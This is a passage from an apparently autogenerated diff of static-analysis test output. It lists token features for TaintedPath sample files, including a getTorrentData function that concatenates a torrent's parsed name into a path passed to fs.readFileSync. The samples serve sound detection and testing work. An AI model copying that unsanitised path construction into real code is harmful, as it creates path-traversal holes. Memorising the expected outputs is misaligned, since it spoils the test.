contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:4:30:4:36 | torrent | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:4:30:4:36 | torrent | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:4:30:4:36 | torrent | contextSurroundingFunctionParameters | (dir, torrent) | +| autogenerated/TaintedPath/torrents.js:4:30:4:36 | torrent | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:4:30:4:36 | torrent | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:4:30:4:36 | torrent | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:4:30:4:36 | torrent | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:4:30:4:36 | torrent | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:4:30:4:36 | torrent | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:5:6:5:9 | name | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:5:6:5:9 | name | contextSurroundingFunctionParameters | (dir, torrent) | +| autogenerated/TaintedPath/torrents.js:5:6:5:9 | name | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:5:6:5:9 | name | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:5:6:5:9 | name | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:5:6:5:38 | name | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:5:6:5:38 | name | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:5:6:5:38 | name | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:5:6:5:38 | name | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:5:6:5:38 | name | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:5:6:5:38 | name = ... t).name | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:5:6:5:38 | name = ... t).name | contextSurroundingFunctionParameters | (dir, torrent) | +| autogenerated/TaintedPath/torrents.js:5:6:5:38 | name = ... t).name | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:5:6:5:38 | name = ... t).name | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:5:6:5:38 | name = ... t).name | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:5:13:5:24 | parseTorrent | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:5:13:5:24 | parseTorrent | contextSurroundingFunctionParameters | (dir, torrent) | +| autogenerated/TaintedPath/torrents.js:5:13:5:24 | parseTorrent | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:5:13:5:24 | parseTorrent | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:5:13:5:24 | parseTorrent | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:5:13:5:33 | exceptional return of parseTo ... orrent) | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:5:13:5:33 | exceptional return of parseTo ... orrent) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:5:13:5:33 | exceptional return of parseTo ... orrent) | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:5:13:5:33 | exceptional return of parseTo ... orrent) | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:5:13:5:33 | exceptional return of parseTo ... orrent) | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:5:13:5:33 | parseTo ... orrent) | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:5:13:5:33 | parseTo ... orrent) | contextSurroundingFunctionParameters | (dir, torrent) | +| autogenerated/TaintedPath/torrents.js:5:13:5:33 | parseTo ... orrent) | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:5:13:5:33 | parseTo ... orrent) | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:5:13:5:33 | parseTo ... orrent) | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:5:13:5:38 | parseTo ... t).name | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:5:13:5:38 | parseTo ... t).name | contextSurroundingFunctionParameters | (dir, torrent) | +| autogenerated/TaintedPath/torrents.js:5:13:5:38 | parseTo ... t).name | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:5:13:5:38 | parseTo ... t).name | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:5:13:5:38 | parseTo ... t).name | fileImports | fs parse-torrent | | autogenerated/TaintedPath/torrents.js:5:26:5:32 | torrent | CalleeFlexibleAccessPath | parseTorrent | | autogenerated/TaintedPath/torrents.js:5:26:5:32 | torrent | InputArgumentIndex | 0 | | autogenerated/TaintedPath/torrents.js:5:26:5:32 | torrent | calleeImports | parse-torrent | @@ -11594,11 +88389,90 @@ tokenFeatures | autogenerated/TaintedPath/torrents.js:5:26:5:32 | torrent | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | | autogenerated/TaintedPath/torrents.js:5:26:5:32 | torrent | enclosingFunctionName | getTorrentData | | autogenerated/TaintedPath/torrents.js:5:26:5:32 | torrent | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:5:35:5:38 | name | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:5:35:5:38 | name | contextSurroundingFunctionParameters | (dir, torrent) | +| autogenerated/TaintedPath/torrents.js:5:35:5:38 | name | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:5:35:5:38 | name | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:5:35:5:38 | name | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:6:6:6:8 | loc | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:6:6:6:8 | loc | contextSurroundingFunctionParameters | (dir, torrent) | +| autogenerated/TaintedPath/torrents.js:6:6:6:8 | loc | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:6:6:6:8 | loc | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:6:6:6:8 | loc | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:6:6:6:45 | loc | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:6:6:6:45 | loc | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:6:6:6:45 | loc | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:6:6:6:45 | loc | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:6:6:6:45 | loc | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:6:6:6:45 | loc = d ... t.data" | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:6:6:6:45 | loc = d ... t.data" | contextSurroundingFunctionParameters | (dir, torrent) | +| autogenerated/TaintedPath/torrents.js:6:6:6:45 | loc = d ... t.data" | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:6:6:6:45 | loc = d ... t.data" | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:6:6:6:45 | loc = d ... t.data" | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:6:12:6:14 | dir | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:6:12:6:14 | dir | contextSurroundingFunctionParameters | (dir, torrent) | +| autogenerated/TaintedPath/torrents.js:6:12:6:14 | dir | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:6:12:6:14 | dir | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:6:12:6:14 | dir | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:6:12:6:14 | dir | stringConcatenatedWith | -endpoint- '/' + name + '.torrent.data' | | autogenerated/TaintedPath/torrents.js:6:12:6:20 | dir + "/" | contextFunctionInterfaces | getTorrentData(dir, torrent) | | autogenerated/TaintedPath/torrents.js:6:12:6:20 | dir + "/" | contextSurroundingFunctionParameters | (dir, torrent) | | autogenerated/TaintedPath/torrents.js:6:12:6:20 | dir + "/" | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | | autogenerated/TaintedPath/torrents.js:6:12:6:20 | dir + "/" | enclosingFunctionName | getTorrentData | | autogenerated/TaintedPath/torrents.js:6:12:6:20 | dir + "/" | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:6:12:6:27 | dir + "/" + name | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:6:12:6:27 | dir + "/" + name | contextSurroundingFunctionParameters | (dir, torrent) | +| autogenerated/TaintedPath/torrents.js:6:12:6:27 | dir + "/" + name | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:6:12:6:27 | dir + "/" + name | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:6:12:6:27 | dir + "/" + name | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:6:12:6:45 | dir + " ... t.data" | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:6:12:6:45 | dir + " ... t.data" | contextSurroundingFunctionParameters | (dir, torrent) | +| autogenerated/TaintedPath/torrents.js:6:12:6:45 | dir + " ... t.data" | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:6:12:6:45 | dir + " ... t.data" | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:6:12:6:45 | dir + " ... t.data" | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:6:18:6:20 | "/" | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:6:18:6:20 | "/" | contextSurroundingFunctionParameters | (dir, torrent) | +| autogenerated/TaintedPath/torrents.js:6:18:6:20 | "/" | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:6:18:6:20 | "/" | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:6:18:6:20 | "/" | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:6:18:6:20 | "/" | stringConcatenatedWith | dir -endpoint- name + '.torrent.data' | +| autogenerated/TaintedPath/torrents.js:6:24:6:27 | name | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:6:24:6:27 | name | contextSurroundingFunctionParameters | (dir, torrent) | +| autogenerated/TaintedPath/torrents.js:6:24:6:27 | name | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:6:24:6:27 | name | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:6:24:6:27 | name | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:6:24:6:27 | name | stringConcatenatedWith | dir + '/' -endpoint- '.torrent.data' | +| autogenerated/TaintedPath/torrents.js:6:31:6:45 | ".torrent.data" | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:6:31:6:45 | ".torrent.data" | contextSurroundingFunctionParameters | (dir, torrent) | +| autogenerated/TaintedPath/torrents.js:6:31:6:45 | ".torrent.data" | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:6:31:6:45 | ".torrent.data" | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:6:31:6:45 | ".torrent.data" | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:6:31:6:45 | ".torrent.data" | stringConcatenatedWith | dir + '/' + name -endpoint- | +| autogenerated/TaintedPath/torrents.js:7:9:7:10 | fs | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:7:9:7:10 | fs | contextSurroundingFunctionParameters | (dir, torrent) | +| autogenerated/TaintedPath/torrents.js:7:9:7:10 | fs | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:7:9:7:10 | fs | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:7:9:7:10 | fs | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:7:9:7:23 | fs.readFileSync | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:7:9:7:23 | fs.readFileSync | contextSurroundingFunctionParameters | (dir, torrent) | +| autogenerated/TaintedPath/torrents.js:7:9:7:23 | fs.readFileSync | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:7:9:7:23 | fs.readFileSync | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:7:9:7:23 | fs.readFileSync | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:7:9:7:28 | exceptional return of fs.readFileSync(loc) | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:7:9:7:28 | exceptional return of fs.readFileSync(loc) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:7:9:7:28 | exceptional return of fs.readFileSync(loc) | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:7:9:7:28 | exceptional return of fs.readFileSync(loc) | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:7:9:7:28 | exceptional return of fs.readFileSync(loc) | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:7:9:7:28 | fs.readFileSync(loc) | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:7:9:7:28 | fs.readFileSync(loc) | contextSurroundingFunctionParameters | (dir, torrent) | +| autogenerated/TaintedPath/torrents.js:7:9:7:28 | fs.readFileSync(loc) | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:7:9:7:28 | fs.readFileSync(loc) | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:7:9:7:28 | fs.readFileSync(loc) | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:7:12:7:23 | readFileSync | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:7:12:7:23 | readFileSync | contextSurroundingFunctionParameters | (dir, torrent) | +| autogenerated/TaintedPath/torrents.js:7:12:7:23 | readFileSync | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:7:12:7:23 | readFileSync | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:7:12:7:23 | readFileSync | fileImports | fs parse-torrent | | autogenerated/TaintedPath/torrents.js:7:25:7:27 | loc | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/torrents.js:7:25:7:27 | loc | InputArgumentIndex | 0 | | autogenerated/TaintedPath/torrents.js:7:25:7:27 | loc | calleeImports | fs | @@ -11608,36 +88482,180 @@ tokenFeatures | autogenerated/TaintedPath/torrents.js:7:25:7:27 | loc | enclosingFunctionName | getTorrentData | | autogenerated/TaintedPath/torrents.js:7:25:7:27 | loc | fileImports | fs parse-torrent | | autogenerated/TaintedPath/torrents.js:7:25:7:27 | loc | receiverName | fs | +| autogenerated/TaintedPath/typescript.ts:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:1:1:1:0 | this | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:1:1:1:1 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:1:1:1:1 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:1:1:1:1 | fs | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:1:1:1:1 | require | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:1:1:1:1 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:1:1:1:1 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:1:1:1:1 | url | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:1:5:1:6 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:1:5:1:6 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:1:5:1:6 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:1:5:1:6 | fs | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:1:5:1:22 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:1:5:1:22 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:1:5:1:22 | fs | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:1:5:1:22 | fs = require('fs') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:1:5:1:22 | fs = require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:1:5:1:22 | fs = require('fs') | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:1:10:1:16 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:1:10:1:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:1:10:1:16 | require | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:1:10:1:22 | exceptional return of require('fs') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:1:10:1:22 | exceptional return of require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:1:10:1:22 | exceptional return of require('fs') | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:1:10:1:22 | require('fs') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:1:10:1:22 | require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:1:10:1:22 | require('fs') | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:1:18:1:21 | 'fs' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/typescript.ts:1:18:1:21 | 'fs' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/typescript.ts:1:18:1:21 | 'fs' | calleeImports | | | autogenerated/TaintedPath/typescript.ts:1:18:1:21 | 'fs' | contextFunctionInterfaces | | | autogenerated/TaintedPath/typescript.ts:1:18:1:21 | 'fs' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/typescript.ts:1:18:1:21 | 'fs' | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:2:5:2:8 | http | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:2:5:2:8 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:2:5:2:8 | http | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:2:5:2:26 | http | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:2:5:2:26 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:2:5:2:26 | http | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:2:5:2:26 | http = ... 'http') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:2:5:2:26 | http = ... 'http') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:2:5:2:26 | http = ... 'http') | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:2:12:2:18 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:2:12:2:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:2:12:2:18 | require | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:2:12:2:26 | exceptional return of require('http') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:2:12:2:26 | exceptional return of require('http') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:2:12:2:26 | exceptional return of require('http') | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:2:12:2:26 | require('http') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:2:12:2:26 | require('http') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:2:12:2:26 | require('http') | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:2:20:2:25 | 'http' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/typescript.ts:2:20:2:25 | 'http' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/typescript.ts:2:20:2:25 | 'http' | calleeImports | | | autogenerated/TaintedPath/typescript.ts:2:20:2:25 | 'http' | contextFunctionInterfaces | | | autogenerated/TaintedPath/typescript.ts:2:20:2:25 | 'http' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/typescript.ts:2:20:2:25 | 'http' | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:3:5:3:7 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:3:5:3:7 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:3:5:3:7 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:3:5:3:7 | url | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:3:5:3:24 | url | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:3:5:3:24 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:3:5:3:24 | url | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:3:5:3:24 | url = require('url') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:3:5:3:24 | url = require('url') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:3:5:3:24 | url = require('url') | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:3:11:3:17 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:3:11:3:17 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:3:11:3:17 | require | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:3:11:3:24 | exceptional return of require('url') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:3:11:3:24 | exceptional return of require('url') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:3:11:3:24 | exceptional return of require('url') | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:3:11:3:24 | require('url') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:3:11:3:24 | require('url') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:3:11:3:24 | require('url') | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:3:19:3:23 | 'url' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/typescript.ts:3:19:3:23 | 'url' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/typescript.ts:3:19:3:23 | 'url' | calleeImports | | | autogenerated/TaintedPath/typescript.ts:3:19:3:23 | 'url' | contextFunctionInterfaces | | | autogenerated/TaintedPath/typescript.ts:3:19:3:23 | 'url' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/typescript.ts:3:19:3:23 | 'url' | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:4:5:4:12 | sanitize | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:4:5:4:12 | sanitize | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:4:5:4:12 | sanitize | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:4:5:4:43 | sanitiz ... ename') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:4:5:4:43 | sanitiz ... ename') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:4:5:4:43 | sanitiz ... ename') | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:4:16:4:22 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:4:16:4:22 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:4:16:4:22 | require | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:4:16:4:43 | exceptional return of require ... ename') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:4:16:4:43 | exceptional return of require ... ename') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:4:16:4:43 | exceptional return of require ... ename') | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:4:16:4:43 | require ... ename') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:4:16:4:43 | require ... ename') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:4:16:4:43 | require ... ename') | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:4:24:4:42 | 'sanitize-filename' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/typescript.ts:4:24:4:42 | 'sanitize-filename' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/typescript.ts:4:24:4:42 | 'sanitize-filename' | calleeImports | | | autogenerated/TaintedPath/typescript.ts:4:24:4:42 | 'sanitize-filename' | contextFunctionInterfaces | | | autogenerated/TaintedPath/typescript.ts:4:24:4:42 | 'sanitize-filename' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/typescript.ts:4:24:4:42 | 'sanitize-filename' | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:5:5:5:14 | pathModule | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:5:5:5:14 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:5:5:5:14 | pathModule | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:5:5:5:32 | pathMod ... 'path') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:5:5:5:32 | pathMod ... 'path') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:5:5:5:32 | pathMod ... 'path') | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:5:18:5:24 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:5:18:5:24 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:5:18:5:24 | require | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:5:18:5:32 | exceptional return of require('path') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:5:18:5:32 | exceptional return of require('path') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:5:18:5:32 | exceptional return of require('path') | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:5:18:5:32 | require('path') | contextFunctionInterfaces | | +| 